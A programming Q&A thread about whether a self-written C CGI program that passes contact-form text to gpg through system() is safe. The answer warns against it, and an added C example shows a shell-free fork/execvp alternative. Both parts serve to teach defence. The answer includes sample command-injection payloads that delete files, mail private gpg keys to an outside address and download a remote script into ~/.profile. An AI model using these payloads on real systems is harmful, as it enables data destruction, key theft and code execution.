Is running a C/C++ CGI script on Apache dangerous?
I am programming my own little website system (a script compiles markdown documents and puts them in the appropriate locations, making a quick, static website). I want to enable people to go to the (initially static) contact page and send me a gnupg-encrypted message.
Basically, the visitor writes his or her message in the contact form, clicks a checkbox if they want the message encrypted, and upon receiving the form, a C(?) program of mine calls system("gpg --encrypt --recipient 31a49121cd42ff00 --armor <the_message>");
(I have yet to determine how to get the message contents and use them in the command without writing the unencrypted message to disk.)
Is it (un)secure to use exec() in a self-made C program that processes form data? Is there a simpler way to achieve what I want (using a standalone script, because the website is static, to run gpg)? Are there security considerations I haven't thought about?
I am asking on here instead of Security SE because I am looking for answers from developers' points of view.
As a security professional who makes at least a modest living consulting on the subject, and a rather prolific C programmer, I can give a few different thoughts on the subject.
When considering the security of processes executing on a target, you have to consider a number of things and how someone may abuse the situation.
a glimpse
Let's look at the immediate security problem I see off hand, using the "system()" call directly on <the_message>; I can imagine the following:
    the_message="hello and goodbye; rm -rf *; cat $HOME/.gpg/* | /usr/bin/sendmail -s 'these are my private keys' temporary_account@hotmail.com"
or worse:
    the_message="hello and goodbye; wget http://some.remote.system.com/evil.sh && mv evil.sh ~/.profile;"
So the first thing: never use user-provided content as a command or as part of a command line; save the message to a temporary text file and encrypt that.
a deeper look
Okay, what's going on in terms of using C? Before I give an answer: I love C; I exclusively program in C and have been a professional developer with a main focus on C for the last 24 years. Now, C is a horrid tool for writing a CGI program in, and you should only do it if you have a compelling reason. And after you find that reason, you should discard it anyway and abandon the thought.
Here are the reasons why you shouldn't use C for the CGI interface.
CGI/1.1 is an ugly standard; it uses environment variables, stdin, and all sorts of character remapping and recoding to get the data across. You are invariably going to have to deal with either implementing the CGI interface yourself or using libcgi or an equivalent library in order to deal with the permutations, and at the end you'll hate it.
When I used http://libcgi.sourceforge.net for a particular project I had to debug, harden and augment it because it had horrible buffer overflow issues left, right and center, non-existent UTF-8 support and limited control over authentication.
But even if you have that covered, C is a bad idea because a lot of security issues arise out of the manual manipulation of memory one has to do.
A higher-level language (shell script, awk, perl, php etc.) is a better tool to handle CGI; perl has it built in, and php was specially built for it. The advantage of using perl or php in this situation is that gnupg modules are available, so you don't have to system() anything.
The key to development is to use the easiest, most straightforward toolkit for the job; in this case I think you should not use C, and force things to be done in the form of a proper CGI processing language such as php.
Those are my thoughts; I hope they help.
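The injection the answer describes comes from handing the message to /bin/sh via system(). The added example below (written for this page, not code from the asker or the answerer) shows the two sides: build_shell_command constructs exactly the string the question's system() call would have the shell parse, and run_filter spawns gpg with fork/execvp and a fixed argv, feeding the message over a pipe on stdin. Because no shell is involved, ';', '|' and '$(' inside the message are just bytes. The pipe also means the plaintext never touches disk, which is what the asker wanted; the answer's temporary-file approach would work equally well as long as the file name, not the message, is the argument. Assumed: gpg is installed and the key id from the question (31a49121cd42ff00) is in the keyring; the sample message is constructed.

```c
/* spawn_gpg.c: run gpg without a shell, passing the untrusted message on stdin.
   Added example for this thread, not code from the question or the answer. */
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <poll.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* What the question's system() call would pass to /bin/sh: the message is
   spliced straight into the command line. Built here only so the effect can
   be inspected; a real program must never hand this string to system(). */
int build_shell_command(const char *msg, char *cmd, size_t cap)
{
    int n = snprintf(cmd, cap, "gpg --encrypt --recipient 31a49121cd42ff00 --armor %s", msg);
    return (n < 0 || (size_t)n >= cap) ? -1 : 0;
}

/* Fork/exec argv directly, write `in` to the child's stdin, collect its stdout.
   Returns the child's exit status, -1 on spawn/wait failure, -2 if the output
   did not fit in `out`. poll() drives both pipes so a child that emits a lot of
   output before finishing its input cannot deadlock against us. */
int run_filter(char *const argv[], const char *in, size_t inlen,
               char *out, size_t outcap, size_t *outlen)
{
    int to_child[2], from_child[2];
    if (pipe(to_child) < 0 || pipe(from_child) < 0) return -1;
    signal(SIGPIPE, SIG_IGN);            /* child exiting early -> EPIPE, not death */
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {                      /* child: wire pipes to stdin/stdout, exec */
        dup2(to_child[0], STDIN_FILENO);
        dup2(from_child[1], STDOUT_FILENO);
        close(to_child[0]); close(to_child[1]);
        close(from_child[0]); close(from_child[1]);
        execvp(argv[0], argv);           /* argv is data, nothing is re-parsed */
        _exit(127);
    }
    close(to_child[0]); close(from_child[1]);
    int wfd = to_child[1], rfd = from_child[0], truncated = 0;
    size_t wrote = 0;
    *outlen = 0;
    if (inlen == 0) { close(wfd); wfd = -1; }
    while (wfd >= 0 || rfd >= 0) {
        struct pollfd pfd[2];
        int n = 0, wi = -1, ri = -1;
        if (wfd >= 0) { pfd[n].fd = wfd; pfd[n].events = POLLOUT; wi = n++; }
        if (rfd >= 0) { pfd[n].fd = rfd; pfd[n].events = POLLIN;  ri = n++; }
        if (poll(pfd, (nfds_t)n, -1) < 0) { if (errno == EINTR) continue; break; }
        if (wi >= 0 && pfd[wi].revents) {
            ssize_t w = write(wfd, in + wrote, inlen - wrote);
            if (w < 0 && errno != EINTR) { close(wfd); wfd = -1; }
            else if (w > 0 && (wrote += (size_t)w) == inlen) { close(wfd); wfd = -1; }
        }
        if (ri >= 0 && pfd[ri].revents) {
            if (*outlen == outcap) {     /* buffer full: peek one byte to detect overflow */
                char scratch;
                if (read(rfd, &scratch, 1) > 0) truncated = 1;
                close(rfd); rfd = -1;
            } else {
                ssize_t r = read(rfd, out + *outlen, outcap - *outlen);
                if (r > 0) *outlen += (size_t)r;
                else if (r == 0 || errno != EINTR) { close(rfd); rfd = -1; }
            }
        }
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    if (truncated) return -2;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Stand-alone use: encrypt a constructed message to the key id from the question. */
int main(void)
{
    char *gpg_argv[] = { "gpg", "--batch", "--encrypt", "--armor",
                         "--recipient", "31a49121cd42ff00", NULL };
    const char *msg = "hello and goodbye; rm -rf *\n";   /* constructed, hostile-looking input */
    static char out[65536];
    size_t outlen;
    int rc = run_filter(gpg_argv, msg, strlen(msg), out, sizeof out, &outlen);
    if (rc != 0) { fprintf(stderr, "gpg failed: %d\n", rc); return 1; }
    fwrite(out, 1, outlen, stdout);
    return 0;
}
```

Two things still need care even with this pattern: the CGI's PATH decides which gpg execvp finds, so use an absolute path or a sanitised environment in production, and gpg's exit status (returned by run_filter) must be checked before the output is treated as ciphertext.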